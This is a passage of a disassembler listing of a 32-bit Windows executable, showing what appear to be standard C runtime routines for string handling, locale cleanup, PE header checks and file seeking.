push dword ptr [esi+30h]
call sub_403603
push dword ptr [esi+34h]
call sub_403603
push dword ptr [esi+1Ch]
call sub_403603
push dword ptr [esi+38h]
call sub_403603
push dword ptr [esi+3Ch]
call sub_403603
add esp, 40h
push dword ptr [esi+40h]
call sub_403603
push dword ptr [esi+44h]
call sub_403603
push dword ptr [esi+48h]
call sub_403603
push dword ptr [esi+4Ch]
call sub_403603
push dword ptr [esi+50h]
call sub_403603
push dword ptr [esi+54h]
call sub_403603
push dword ptr [esi+58h]
call sub_403603
push dword ptr [esi+5Ch]
call sub_403603
push dword ptr [esi+60h]
call sub_403603
push dword ptr [esi+64h]
call sub_403603
push dword ptr [esi+68h]
call sub_403603
push dword ptr [esi+6Ch]
call sub_403603
push dword ptr [esi+70h]
call sub_403603
push dword ptr [esi+74h]
call sub_403603
push dword ptr [esi+78h]
call sub_403603
push dword ptr [esi+7Ch]
call sub_403603
add esp, 40h
push dword ptr [esi+80h]
call sub_403603
push dword ptr [esi+84h]
call sub_403603
push dword ptr [esi+88h]
call sub_403603
push dword ptr [esi+8Ch]
call sub_403603
push dword ptr [esi+90h]
call sub_403603
push dword ptr [esi+94h]
call sub_403603
push dword ptr [esi+98h]
call sub_403603
push dword ptr [esi+9Ch]
call sub_403603
push dword ptr [esi+0A0h]
call sub_403603
push dword ptr [esi+0A4h]
call sub_403603
push dword ptr [esi+0A8h]
call sub_403603
add esp, 2Ch
loc_40C6C2: ; CODE XREF: sub_40C534+7�j
pop esi
retn
sub_40C534 endp
; =============== S U B R O U T I N E =======================================
sub_40C6C4 proc near ; CODE XREF: sub_404E21+64�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40C702
mov eax, [esi]
cmp eax, ds:off_423F38
jz short loc_40C6DE
push eax
call sub_403603
pop ecx
loc_40C6DE: ; CODE XREF: sub_40C6C4+11�j
mov eax, [esi+4]
cmp eax, ds:off_423F3C
jz short loc_40C6F0
push eax
call sub_403603
pop ecx
loc_40C6F0: ; CODE XREF: sub_40C6C4+23�j
mov esi, [esi+8]
cmp esi, ds:off_423F40
jz short loc_40C702
push esi
call sub_403603
pop ecx
loc_40C702: ; CODE XREF: sub_40C6C4+7�j
; sub_40C6C4+35�j
pop esi
retn
sub_40C6C4 endp
; =============== S U B R O U T I N E =======================================
sub_40C704 proc near ; CODE XREF: sub_404E21+43�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40C78B
mov eax, [esi+0Ch]
cmp eax, ds:off_423F44
jz short loc_40C71F
push eax
call sub_403603
pop ecx
loc_40C71F: ; CODE XREF: sub_40C704+12�j
mov eax, [esi+10h]
cmp eax, ds:off_423F48
jz short loc_40C731
push eax
call sub_403603
pop ecx
loc_40C731: ; CODE XREF: sub_40C704+24�j
mov eax, [esi+14h]
cmp eax, ds:off_423F4C
jz short loc_40C743
push eax
call sub_403603
pop ecx
loc_40C743: ; CODE XREF: sub_40C704+36�j
mov eax, [esi+18h]
cmp eax, ds:off_423F50
jz short loc_40C755
push eax
call sub_403603
pop ecx
loc_40C755: ; CODE XREF: sub_40C704+48�j
mov eax, [esi+1Ch]
cmp eax, ds:off_423F54
jz short loc_40C767
push eax
call sub_403603
pop ecx
loc_40C767: ; CODE XREF: sub_40C704+5A�j
mov eax, [esi+20h]
cmp eax, ds:off_423F58
jz short loc_40C779
push eax
call sub_403603
pop ecx
loc_40C779: ; CODE XREF: sub_40C704+6C�j
mov esi, [esi+24h]
cmp esi, ds:off_423F5C
jz short loc_40C78B
push esi
call sub_403603
pop ecx
loc_40C78B: ; CODE XREF: sub_40C704+7�j
; sub_40C704+7E�j
pop esi
retn
sub_40C704 endp
; =============== S U B R O U T I N E =======================================
sub_40C78D proc near ; CODE XREF: sub_409AB4+117�p
; sub_409AB4+139�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
xor ebx, ebx
cmp eax, ebx
push esi
push edi
jz short loc_40C7A2
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_40C7BD
loc_40C7A2: ; CODE XREF: sub_40C78D+B�j
; sub_40C78D+3A�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_40C7AC: ; CODE XREF: sub_40C78D+69�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_40C7FA
; ---------------------------------------------------------------------------
loc_40C7BD: ; CODE XREF: sub_40C78D+13�j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_40C7C9
loc_40C7C5: ; CODE XREF: sub_40C78D+48�j
mov [eax], bl
jmp short loc_40C7A2
; ---------------------------------------------------------------------------
loc_40C7C9: ; CODE XREF: sub_40C78D+36�j
mov edx, eax
loc_40C7CB: ; CODE XREF: sub_40C78D+44�j
cmp [edx], bl
jz short loc_40C7D3
inc edx
dec edi
jnz short loc_40C7CB
loc_40C7D3: ; CODE XREF: sub_40C78D+40�j
cmp edi, ebx
jz short loc_40C7C5
loc_40C7D7: ; CODE XREF: sub_40C78D+55�j
mov cl, [esi]
mov [edx], cl
inc edx
inc esi
cmp cl, bl
jz short loc_40C7E4
dec edi
jnz short loc_40C7D7
loc_40C7E4: ; CODE XREF: sub_40C78D+52�j
cmp edi, ebx
jnz short loc_40C7F8
mov [eax], bl
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_40C7AC
; ---------------------------------------------------------------------------
loc_40C7F8: ; CODE XREF: sub_40C78D+59�j
xor eax, eax
loc_40C7FA: ; CODE XREF: sub_40C78D+2E�j
pop edi
pop esi
pop ebx
retn
sub_40C78D endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40C814: ; CODE XREF: seg000:0040C821�j
mov al, [edx]
or al, al
jz short loc_40C823
add edx, 1
bts [esp], eax
jmp short loc_40C814
; ---------------------------------------------------------------------------
loc_40C823: ; CODE XREF: seg000:0040C818�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
lea ecx, [ecx+0]
loc_40C82C: ; CODE XREF: seg000:0040C83C�j
add ecx, 1
mov al, [esi]
or al, al
jz short loc_40C83E
add esi, 1
bt [esp], eax
jnb short loc_40C82C
loc_40C83E: ; CODE XREF: seg000:0040C833�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C846 proc near ; CODE XREF: sub_409AB4+F1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp [ebp+arg_C], ebx
push edi
jnz short loc_40C866
cmp esi, ebx
jnz short loc_40C86A
cmp [ebp+arg_4], ebx
jnz short loc_40C871
loc_40C85F: ; CODE XREF: sub_40C846+4D�j
; sub_40C846+8C�j
xor eax, eax
loc_40C861: ; CODE XREF: sub_40C846+44�j
; sub_40C846+9E�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40C866: ; CODE XREF: sub_40C846+E�j
cmp esi, ebx
jz short loc_40C871
loc_40C86A: ; CODE XREF: sub_40C846+12�j
mov edi, [ebp+arg_4]
cmp edi, ebx
ja short loc_40C88C
loc_40C871: ; CODE XREF: sub_40C846+17�j
; sub_40C846+22�j ...
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_40C87B: ; CODE XREF: sub_40C846+B1�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_40C861
; ---------------------------------------------------------------------------
loc_40C88C: ; CODE XREF: sub_40C846+29�j
cmp [ebp+arg_C], ebx
jnz short loc_40C895
mov [esi], bl
jmp short loc_40C85F
; ---------------------------------------------------------------------------
loc_40C895: ; CODE XREF: sub_40C846+49�j
mov edx, [ebp+arg_8]
cmp edx, ebx
jnz short loc_40C8A0
mov [esi], bl
jmp short loc_40C871
; ---------------------------------------------------------------------------
loc_40C8A0: ; CODE XREF: sub_40C846+54�j
cmp [ebp+arg_C], 0FFFFFFFFh
mov eax, esi
jnz short loc_40C8B7
loc_40C8A8: ; CODE XREF: sub_40C846+6D�j
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_40C8D0
dec edi
jnz short loc_40C8A8
jmp short loc_40C8D0
; ---------------------------------------------------------------------------
loc_40C8B7: ; CODE XREF: sub_40C846+60�j
; sub_40C846+81�j
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_40C8C9
dec edi
jz short loc_40C8C9
dec [ebp+arg_C]
jnz short loc_40C8B7
loc_40C8C9: ; CODE XREF: sub_40C846+79�j
; sub_40C846+7C�j
cmp [ebp+arg_C], ebx
jnz short loc_40C8D0
mov [eax], bl
loc_40C8D0: ; CODE XREF: sub_40C846+6A�j
; sub_40C846+6F�j ...
cmp edi, ebx
jnz short loc_40C85F
cmp [ebp+arg_C], 0FFFFFFFFh
jnz short loc_40C8E9
mov eax, [ebp+arg_4]
push 50h
mov [esi+eax-1], bl
pop eax
jmp loc_40C861
; ---------------------------------------------------------------------------
loc_40C8E9: ; CODE XREF: sub_40C846+92�j
mov [esi], bl
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_40C87B
sub_40C846 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C8F9 proc near ; CODE XREF: sub_40E9C7+32�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
jnz short loc_40C910
xor eax, eax
jmp loc_40C9AA
; ---------------------------------------------------------------------------
loc_40C910: ; CODE XREF: sub_40C8F9+E�j
cmp ebx, 4
push edi
jb short loc_40C98B
lea edi, [ebx-4]
test edi, edi
jbe short loc_40C98B
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
loc_40C923: ; CODE XREF: sub_40C8F9+66�j
mov dl, [eax]
add eax, 4
add ecx, 4
test dl, dl
jz short loc_40C981
cmp dl, [ecx-4]
jnz short loc_40C981
mov dl, [eax-3]
test dl, dl
jz short loc_40C977
cmp dl, [ecx-3]
jnz short loc_40C977
mov dl, [eax-2]
test dl, dl
jz short loc_40C96D
cmp dl, [ecx-2]
jnz short loc_40C96D
mov dl, [eax-1]
test dl, dl
jz short loc_40C963
cmp dl, [ecx-1]
jnz short loc_40C963
add [ebp+var_4], 4
cmp [ebp+var_4], edi
jb short loc_40C923
jmp short loc_40C9A2
; ---------------------------------------------------------------------------
loc_40C963: ; CODE XREF: sub_40C8F9+58�j
; sub_40C8F9+5D�j
movzx eax, byte ptr [eax-1]
movzx ecx, byte ptr [ecx-1]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C96D: ; CODE XREF: sub_40C8F9+4C�j
; sub_40C8F9+51�j
movzx eax, byte ptr [eax-2]
movzx ecx, byte ptr [ecx-2]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C977: ; CODE XREF: sub_40C8F9+40�j
; sub_40C8F9+45�j
movzx eax, byte ptr [eax-3]
movzx ecx, byte ptr [ecx-3]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C981: ; CODE XREF: sub_40C8F9+34�j
; sub_40C8F9+39�j
movzx eax, byte ptr [eax-4]
movzx ecx, byte ptr [ecx-4]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C98B: ; CODE XREF: sub_40C8F9+1B�j
; sub_40C8F9+22�j
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
jmp short loc_40C9A2
; ---------------------------------------------------------------------------
loc_40C993: ; CODE XREF: sub_40C8F9+AC�j
mov dl, [eax]
test dl, dl
jz short loc_40C9AD
cmp dl, [ecx]
jnz short loc_40C9AD
inc eax
inc ecx
inc [ebp+var_4]
loc_40C9A2: ; CODE XREF: sub_40C8F9+68�j
; sub_40C8F9+98�j
cmp [ebp+var_4], ebx
jb short loc_40C993
xor eax, eax
loc_40C9A9: ; CODE XREF: sub_40C8F9+BC�j
pop edi
loc_40C9AA: ; CODE XREF: sub_40C8F9+12�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40C9AD: ; CODE XREF: sub_40C8F9+9E�j
; sub_40C8F9+A2�j
movzx eax, byte ptr [eax]
movzx ecx, byte ptr [ecx]
loc_40C9B3: ; CODE XREF: sub_40C8F9+72�j
; sub_40C8F9+7C�j ...
sub eax, ecx
jmp short loc_40C9A9
sub_40C8F9 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40C9D4: ; CODE XREF: seg000:0040C9E1�j
mov al, [edx]
or al, al
jz short loc_40C9E3
add edx, 1
bts [esp], eax
jmp short loc_40C9D4
; ---------------------------------------------------------------------------
loc_40C9E3: ; CODE XREF: seg000:0040C9D8�j
mov esi, [ebp+8]
mov edi, edi
loc_40C9E8: ; CODE XREF: seg000:0040C9F5�j
mov al, [esi]
or al, al
jz short loc_40C9FA
add esi, 1
bt [esp], eax
jnb short loc_40C9E8
lea eax, [esi-1]
loc_40C9FA: ; CODE XREF: seg000:0040C9EC�j
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA00 proc near ; CODE XREF: sub_40565A+93�p
; sub_4069D7+34D�p ...
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
movzx eax, [ebp+arg_0]
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, 8000h
cmp [ebp+var_4], 0
jz short locret_40CA34
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40CA34: ; CODE XREF: sub_40CA00+2B�j
leave
retn
sub_40CA00 endp
; =============== S U B R O U T I N E =======================================
sub_40CA36 proc near ; CODE XREF: seg000:00409532�p
; seg000:004099EC�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40CA00
pop ecx
pop ecx
retn
sub_40CA36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA44 proc near ; CODE XREF: sub_40565A+32�p
; sub_40A7C0+81�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push [ebp+arg_8]
lea ecx, [ebp+var_18]
call sub_40271F
mov ebx, [ebp+arg_0]
lea eax, [ebx+1]
cmp eax, 100h
ja short loc_40CA72
mov eax, [ebp+var_18]
mov eax, [eax+0C8h]
movzx eax, word ptr [eax+ebx*2]
jmp short loc_40CAE7
; ---------------------------------------------------------------------------
loc_40CA72: ; CODE XREF: sub_40CA44+1D�j
mov [ebp+arg_0], ebx
sar [ebp+arg_0], 8
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+arg_0]
and eax, 0FFh
push eax
call sub_40CA00
test eax, eax
pop ecx
pop ecx
jz short loc_40CAA3
mov al, byte ptr [ebp+arg_0]
push 2
mov [ebp+var_8], al
mov [ebp+var_7], bl
mov [ebp+var_6], 0
pop ecx
jmp short loc_40CAAD
; ---------------------------------------------------------------------------
loc_40CAA3: ; CODE XREF: sub_40CA44+4B�j
xor ecx, ecx
mov [ebp+var_8], bl
mov [ebp+var_7], 0
inc ecx
loc_40CAAD: ; CODE XREF: sub_40CA44+5D�j
mov eax, [ebp+var_18]
push 1
push dword ptr [eax+14h]
push dword ptr [eax+4]
lea eax, [ebp+var_4]
push eax
push ecx
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push 1
push eax
call sub_40C4F4
add esp, 20h
test eax, eax
jnz short loc_40CAE3
cmp [ebp+var_C], al
jz short loc_40CADF
mov eax, [ebp+var_10]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40CADF: ; CODE XREF: sub_40CA44+92�j
xor eax, eax
jmp short loc_40CAF7
; ---------------------------------------------------------------------------
loc_40CAE3: ; CODE XREF: sub_40CA44+8D�j
movzx eax, [ebp+var_4]
loc_40CAE7: ; CODE XREF: sub_40CA44+2C�j
and eax, [ebp+arg_4]
cmp [ebp+var_C], 0
jz short loc_40CAF7
mov ecx, [ebp+var_10]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40CAF7: ; CODE XREF: sub_40CA44+9D�j
; sub_40CA44+AA�j
pop ebx
leave
retn
sub_40CA44 endp
; =============== S U B R O U T I N E =======================================
sub_40CAFA proc near ; CODE XREF: sub_407B19+F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_42641C, eax
retn
sub_40CAFA endp
; ---------------------------------------------------------------------------
loc_40CB04: ; DATA XREF: sub_40CB14:loc_40CB79�o
push dword ptr [esp+4]
call ds:dword_41D120
xor eax, eax
inc eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CB14 proc near ; CODE XREF: sub_405881+26�p
; sub_405934+78�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 14h
push offset dword_421760
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
push ds:dword_42641C
call sub_405193
pop ecx
mov esi, eax
cmp esi, edi
jnz short loc_40CB8A
lea eax, [ebp+var_1C]
push eax
call sub_407906
pop ecx
cmp eax, edi
jz short loc_40CB52
push edi
push edi
push edi
push edi
push edi
call sub_402E3D
add esp, 14h
loc_40CB52: ; CODE XREF: sub_40CB14+2F�j
cmp [ebp+var_1C], 1
jz short loc_40CB79
push offset aKernel32_dl_10 ; "kernel32.dll"
call ds:dword_41D0E4
cmp eax, edi
jz short loc_40CB79
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call ds:dword_41D0EC
mov esi, eax
cmp esi, edi
jnz short loc_40CB7E
loc_40CB79: ; CODE XREF: sub_40CB14+42�j
; sub_40CB14+51�j
mov esi, offset loc_40CB04
loc_40CB7E: ; CODE XREF: sub_40CB14+63�j
push esi
call sub_405127
pop ecx
mov ds:dword_42641C, eax
loc_40CB8A: ; CODE XREF: sub_40CB14+21�j
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_4]
push [ebp+arg_0]
call esi
mov [ebp+var_20], eax
jmp short loc_40CBC9
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_24], eax
xor ecx, ecx
cmp eax, 0C0000017h
setz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
cmp [ebp+var_24], 0C0000017h
jnz short loc_40CBC5
push 8
call ds:dword_41D174
loc_40CBC5: ; CODE XREF: sub_40CB14+A7�j
and [ebp+var_20], 0
loc_40CBC9: ; CODE XREF: sub_40CB14+84�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_20]
call __SEH_epilog4
retn
sub_40CB14 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40CBE0 proc near ; CODE XREF: sub_40CC52+16�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 5A4Dh
jz short loc_40CBEE
loc_40CBEB: ; CODE XREF: sub_40CBE0+19�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40CBEE: ; CODE XREF: sub_40CBE0+9�j
mov eax, [ecx+3Ch]
add eax, ecx
cmp dword ptr [eax], 4550h
jnz short loc_40CBEB
xor ecx, ecx
cmp word ptr [eax+18h], 10Bh
setz cl
mov eax, ecx
retn
sub_40CBE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40CC10 proc near ; CODE XREF: sub_40CC52+27�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
push ebx
push esi
movzx esi, word ptr [ecx+6]
xor edx, edx
test esi, esi
push edi
lea eax, [eax+ecx+18h]
jbe short loc_40CC4C
mov edi, [esp+0Ch+arg_4]
loc_40CC32: ; CODE XREF: sub_40CC10+3A�j
mov ecx, [eax+0Ch]
cmp edi, ecx
jb short loc_40CC42
mov ebx, [eax+8]
add ebx, ecx
cmp edi, ebx
jb short loc_40CC4E
loc_40CC42: ; CODE XREF: sub_40CC10+27�j
add edx, 1
add eax, 28h
cmp edx, esi
jb short loc_40CC32
loc_40CC4C: ; CODE XREF: sub_40CC10+1C�j
xor eax, eax
loc_40CC4E: ; CODE XREF: sub_40CC10+30�j
pop edi
pop esi
pop ebx
retn
sub_40CC10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CC52 proc near ; CODE XREF: sub_406640+FF�p
; sub_407979+E�p ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421780
call __SEH_prolog4
and [ebp+ms_exc.disabled], 0
mov edx, 400000h
push edx
call sub_40CBE0
pop ecx
test eax, eax
jz short loc_40CCAF
mov eax, [ebp+arg_0]
sub eax, edx
push eax
push edx
call sub_40CC10
pop ecx
pop ecx
test eax, eax
jz short loc_40CCAF
mov eax, [eax+24h]
shr eax, 1Fh
not eax
and eax, 1
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
jmp short loc_40CCB8
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
xor ecx, ecx
cmp eax, 0C0000005h
setz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_40CCAF: ; CODE XREF: sub_40CC52+1E�j
; sub_40CC52+30�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
xor eax, eax
loc_40CCB8: ; CODE XREF: sub_40CC52+44�j
call __SEH_epilog4
retn
sub_40CC52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CCBE proc near ; CODE XREF: sub_409DAD+2EE�p
; sub_409DAD+3C8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
push edi
push esi
mov [ebp+var_4], eax
call sub_40ED7D
or edi, 0FFFFFFFFh
cmp eax, edi
pop ecx
jnz short loc_40CCF3
call sub_4057D3
mov dword ptr [eax], 9
loc_40CCED: ; CODE XREF: sub_40CCBE+5E�j
mov eax, edi
mov edx, edi
jmp short loc_40CD3D
; ---------------------------------------------------------------------------
loc_40CCF3: ; CODE XREF: sub_40CCBE+22�j
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call ds:dword_41D074
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_40CD1E
call ds:dword_41D0F0
test eax, eax
jz short loc_40CD1E
push eax
call sub_4057F9
pop ecx
jmp short loc_40CCED
; ---------------------------------------------------------------------------
loc_40CD1E: ; CODE XREF: sub_40CCBE+4B�j
; sub_40CCBE+55�j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
loc_40CD3D: ; CODE XREF: sub_40CCBE+33�j
pop edi
pop esi
leave
retn
sub_40CCBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CD41 proc near ; CODE XREF: sub_4067D6+116�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 14h
push offset dword_4217A0
call __SEH_prolog4
or esi, 0FFFFFFFFh
mov [ebp+var_24], esi
mov [ebp+var_20], esi
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40CD7A
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_40CD71: ; CODE XREF: sub_40CD41+66�j
mov eax, esi
mov edx, esi
jmp loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CD7A: ; CODE XREF: sub_40CD41+1B�j
xor edi, edi
cmp eax, edi
jl short loc_40CD88
cmp eax, ds:dword_433C84
jb short loc_40CDA9
loc_40CD88: ; CODE XREF: sub_40CD41+3D�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_40CD71
; ---------------------------------------------------------------------------
loc_40CDA9: ; CODE XREF: sub_40CD41+45�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jnz short loc_40CDEF
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
or edx, 0FFFFFFFFh
mov eax, edx
jmp short loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CDEF: ; CODE XREF: sub_40CD41+86�j
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40CE1E
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
mov [ebp+var_24], eax
mov [ebp+var_20], edx
jmp short loc_40CE38
; ---------------------------------------------------------------------------
loc_40CE1E: ; CODE XREF: sub_40CD41+BF�j
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], edi
or [ebp+var_24], 0FFFFFFFFh
or [ebp+var_20], 0FFFFFFFFh
loc_40CE38: ; CODE XREF: sub_40CD41+DB�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40CE50
mov eax, [ebp+var_24]
mov edx, [ebp+var_20]
loc_40CE4A: ; CODE XREF: sub_40CD41+34�j
; sub_40CD41+AC�j
call __SEH_epilog4
retn
sub_40CD41 endp
; =============== S U B R O U T I N E =======================================
sub_40CE50 proc near ; CODE XREF: sub_40CD41+FE�p
; DATA XREF: seg001:004217B8�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40CE50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=518h
sub_40CE5A proc near ; CODE XREF: sub_40D420+9A�p
; sub_4105A7+BB�p
var_594 = dword ptr -594h
var_590 = dword ptr -590h
var_58C = dword ptr -58Ch
var_588 = dword ptr -588h
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_578 = dword ptr -578h
var_574 = dword ptr -574h
var_56D = byte ptr -56Dh
var_56C = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = byte ptr -564h
var_410 = byte ptr -410h
var_160 = byte ptr -160h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-518h]
sub esp, 594h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+518h+var_4], eax
mov eax, [ebp+518h+arg_4]
push esi
xor esi, esi
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_57C], eax
mov [ebp+518h+var_578], esi
mov [ebp+518h+var_580], esi
jnz short loc_40CE96
xor eax, eax
jmp loc_40D40A
; ---------------------------------------------------------------------------
loc_40CE96: ; CODE XREF: sub_40CE5A+33�j
cmp eax, esi
jnz short loc_40CEC1
call sub_4057E6
mov [eax], esi
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_40D40A
; ---------------------------------------------------------------------------
loc_40CEC1: ; CODE XREF: sub_40CE5A+3E�j
mov esi, [ebp+518h+arg_0]
push ebx
mov ebx, esi
and ebx, 1Fh
imul ebx, 28h
mov eax, esi
sar eax, 5
push edi
lea edi, ds:433CA0h[eax*4]
mov eax, [edi]
add eax, ebx
mov cl, [eax+24h]
add cl, cl
sar cl, 1
cmp cl, 2
mov [ebp+518h+var_588], edi
mov [ebp+518h+var_56D], cl
